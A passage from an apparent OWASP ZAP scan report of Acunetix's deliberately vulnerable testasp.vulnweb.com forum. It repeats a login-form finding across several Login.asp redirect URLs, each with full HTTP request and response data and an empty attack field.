class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="POST"> |
Request Header - size: 369 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:40 GMT Content-Length: 3132 |
Response Body - size: 3,132 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="POST"> |
Request Header - size: 369 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=1 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:39 GMT Content-Length: 3132 |
Response Body - size: 3,132 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="POST"> |
Request Header - size: 369 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=2 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:40 GMT Content-Length: 3132 |
Response Body - size: 3,132 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="POST"> |
Request Header - size: 371 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:00 GMT Content-Length: 3133 |
Response Body - size: 3,133 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="POST"> |
Request Header - size: 371 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=1 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:00 GMT Content-Length: 3133 |
Response Body - size: 3,133 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="POST"> |
Request Header - size: 506 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Referer: http://testasp.vulnweb.com/showthread.asp?id=10 Cookie: ASPSESSIONIDASSBRCRC=FCLMIJFALIPFLHBOMHKNEOFN Upgrade-Insecure-Requests: 1 |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:03:23 GMT Content-Length: 3218 |
Response Body - size: 3,218 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="POST"> |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=11 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:01 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="POST"> |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=12 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:01 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="POST"> |
Request Header - size: 373 bytes. |
